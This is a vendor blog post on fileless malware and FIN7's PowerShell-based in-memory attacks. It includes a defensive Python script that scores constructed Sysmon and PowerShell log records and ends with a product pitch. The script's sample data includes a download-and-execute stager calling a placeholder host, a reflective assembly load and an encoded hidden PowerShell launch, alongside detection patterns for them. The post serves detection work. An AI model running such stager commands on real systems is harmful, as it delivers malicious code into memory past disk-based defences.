Fileless malware is rapidly gaining popularity. Once a cyberwarfare technique used mostly by state-level actors, fileless malware has percolated into the hands of more common criminals. A recent large-scale cyberattack against US restaurants shows that fileless malware attacks are the newest threat administrators need to worry about. Here's how it works, and how to stop it.
What's the Deal with Fileless Malware Attacks?
In the normal course of events, conventional malware is written to a computer's hard drive, where it sits in a hidden folder, takes over processes, and attempts to exfiltrate data to an external bad actor. Fileless malware doesn't work this way. Instead of writing malicious programs to the hard drive, fileless malware runs its payload in memory, the computer's RAM.
To be clear, the initial infection phase of fileless malware does involve a file. Typically, this takes the form of a Word document or text file. The intended victim opens the file and turns off "protected view." This is actually the hardest part of the attack, as Windows strongly recommends against turning off protected view for any downloaded file. Still, convincing users to ignore a safety warning has never been especially difficult.
With the safeguards thus removed, the malware is free to do its work. Not every form of fileless malware works the same way, of course, but the malware used in the most recent attack on US restaurants is typical. The malware, created by a group known as FIN7, first creates two files which are split in half. The first file creates a piece of Windows code that executes the second; the second file is what finally starts the fileless processes, using PowerShell.
PowerShell Is the Key to Many Fileless Malware Examples
Although the initial form of the FIN7 malware uses a Microsoft Word exploit, it doesn't have to. The key for FIN7 is the second file it creates, which begins executing processes using a tool known as PowerShell. PowerShell is an extremely important tool for fileless malware because it can create and run scripts directly in memory.
PowerShell is typically used by administrators to perform tasks remotely on Windows systems. In order to accomplish its legitimate purpose, it must bypass policies that would ordinarily forbid admins from executing code remotely. Attackers can use this same feature to execute code in memory, completely evading endpoint security that only scans files on disk. Because of this, nearly 20% of all attacks that affect the endpoint now begin as in-memory attacks.
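The two paragraphs above give defenders the signals worth watching for: an Office document spawning PowerShell, and PowerShell command lines or script blocks that pull code into memory rather than off disk. The following is an added example of that detection logic, not code from this post or from FIN7. It runs over constructed sample records laid out like Sysmon process-creation (Event ID 1) and PowerShell script block (Event ID 4104) fields; the field names, sample values and the weighting scheme are assumptions for illustration, and the regular expressions are common detection-engineering starting points rather than a complete rule set.

```python
"""Score endpoint telemetry for PowerShell-driven in-memory execution.
Added example; the records below are constructed samples, not real captures."""
import base64
import re
from typing import Dict, List

# Constructed process-creation records in the shape of Sysmon Event ID 1 fields.
PROCESS_EVENTS: List[Dict[str, str]] = [
    {"id": "1", "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMQA="},
    {"id": "2", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\scripts\nightly-backup.ps1"},
    {"id": "3", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
]

# Constructed script-block text in the shape of PowerShell Event ID 4104 entries.
SCRIPT_BLOCKS: List[Dict[str, str]] = [
    {"id": "10", "text": "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"},
    {"id": "11", "text": r"Get-ChildItem C:\Logs | Where-Object { $_.Length -gt 1MB }"},
    {"id": "12", "text": "[System.Reflection.Assembly]::Load([Convert]::FromBase64String($blob))"},
]

OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")
SHELL_IMAGES = ("powershell.exe", "pwsh.exe", "powershell_ise.exe")

# PowerShell accepts any unambiguous prefix of a parameter name, so -e, -ec and
# -enc all mean -EncodedCommand; its argument is base64 of UTF-16LE text.
ENCODED_RE = re.compile(r"(?i)(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")
HIDDEN_RE = re.compile(r"(?i)(?:^|\s)-w(?:indowstyle)?\s+hidden\b")
NOPROFILE_RE = re.compile(r"(?i)(?:^|\s)-nop(?:rofile)?\b")

# Script-block shapes typical of download-and-run and load-from-memory stagers.
BLOCK_PATTERNS = {
    "download_and_invoke": re.compile(
        r"(?i)\b(?:iex|invoke-expression)\b.*\b(?:downloadstring|downloaddata|invoke-webrequest|iwr)\b"),
    "reflective_load": re.compile(r"(?i)\[System\.Reflection\.Assembly\]::Load\b"),
    "base64_decode": re.compile(r"(?i)\[Convert\]::FromBase64String\b"),
}

# A lone -NoProfile or hidden window is common in legitimate scheduled tasks, so
# signals are weighted (assumed weights) and only combinations or strong signals alert.
WEIGHTS = {"office_spawned_powershell": 3, "encoded_command": 2, "hidden_window": 1,
           "no_profile": 1, "download_and_invoke": 3, "reflective_load": 3, "base64_decode": 1}
ALERT_THRESHOLD = 2


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(blob: str) -> str:
    """Reveal the real command hidden behind -EncodedCommand."""
    return base64.b64decode(blob).decode("utf-16-le")


def analyse_process(ev: Dict[str, str]) -> Dict[str, object]:
    """Score one process-creation record; only PowerShell launches are examined."""
    reasons: List[str] = []
    decoded = None
    if basename(ev["image"]) in SHELL_IMAGES:
        if basename(ev["parent"]) in OFFICE_PARENTS:
            reasons.append("office_spawned_powershell")
        m = ENCODED_RE.search(ev["cmdline"])
        if m:
            reasons.append("encoded_command")
            try:
                decoded = decode_encoded_command(m.group(1))
            except (ValueError, UnicodeDecodeError):
                decoded = "<undecodable>"
        if HIDDEN_RE.search(ev["cmdline"]):
            reasons.append("hidden_window")
        if NOPROFILE_RE.search(ev["cmdline"]):
            reasons.append("no_profile")
    return {"id": ev["id"], "reasons": reasons,
            "score": sum(WEIGHTS[r] for r in reasons), "decoded": decoded}


def analyse_script_block(sb: Dict[str, str]) -> Dict[str, object]:
    """Score one script-block log entry against the stager patterns."""
    reasons = [name for name, rx in BLOCK_PATTERNS.items() if rx.search(sb["text"])]
    return {"id": sb["id"], "reasons": reasons,
            "score": sum(WEIGHTS[r] for r in reasons), "decoded": None}


def run_detection(process_events, script_blocks) -> List[Dict[str, object]]:
    """Return every record whose weighted score reaches the alert threshold."""
    results = [analyse_process(e) for e in process_events]
    results += [analyse_script_block(b) for b in script_blocks]
    return [r for r in results if r["score"] >= ALERT_THRESHOLD]


if __name__ == "__main__":
    for alert in run_detection(PROCESS_EVENTS, SCRIPT_BLOCKS):
        line = f"ALERT id={alert['id']} score={alert['score']} reasons={','.join(alert['reasons'])}"
        if alert["decoded"]:
            line += f" decoded={alert['decoded']!r}"
        print(line)
```

Two design points matter in practice. First, the script-block patterns only fire if Script Block Logging is turned on, since that is what produces the 4104 events; without it the in-memory stage leaves no script text to inspect. Second, decoding the -EncodedCommand argument in the alert itself saves the analyst a step and turns an opaque base64 blob into the command that actually ran, which is the whole point of watching PowerShell rather than the disk.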
How Can Administrators Mitigate Fileless Malware?
Fileless malware isn't necessarily a world-ending threat, and its name is a bit of a misnomer (the initial infection still involves files). Still, administrators definitely need to be cautious and prepared; otherwise the infection will slip right past your existing endpoint protection solution.
If this happens, your only defense is going to be your ability to monitor the data that's coming out of your network. That's where Safe-T comes in. The Safe-T Integrated Data Security Platform can monitor all common enterprise file transfer protocols and determine whether customer data is leaving anywhere it shouldn't. For more information, check out our white paper on the Next Generation Security Perimeter.